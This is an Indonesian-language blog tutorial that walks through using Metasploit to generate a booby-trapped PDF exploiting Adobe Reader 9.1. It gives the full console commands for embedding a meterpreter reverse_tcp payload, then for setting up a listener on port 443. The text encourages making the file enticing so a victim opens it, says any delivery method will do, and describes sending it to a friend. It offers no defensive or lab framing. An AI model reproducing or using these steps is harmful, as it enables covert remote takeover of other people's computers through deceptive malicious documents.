Exploit Using Adobe PDF With Metasploit | DV

By | 12:38 AM Leave a Comment



Level : Medium, Hard

Testing : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Kali Linux in this tutorial)


Berikut ini tahap-tahapannya :

Buka terminal anda dan ketikan ini:


Code:
  • service postgresql start
    service metasploit start
    msfconsole




 setelah terbuka metasploit anda ketikan ini:


Code:
  • use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
    set payload windows/meterpreter/reverse_tcp
    set filename tugas.pdf
    set lhost 192.168.1.100
    set lport 443
    exploit

Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya


 Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.

setelah file kita berada di pc korban tinggal ketikan ini di terminal:


Code:
  • use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport 443
    set lhost 192.168.1.100 (ip anda)
    exploit

 SOURCE: indonesianbacktrack.or.id
Newer Post Older Post Home

0 comments: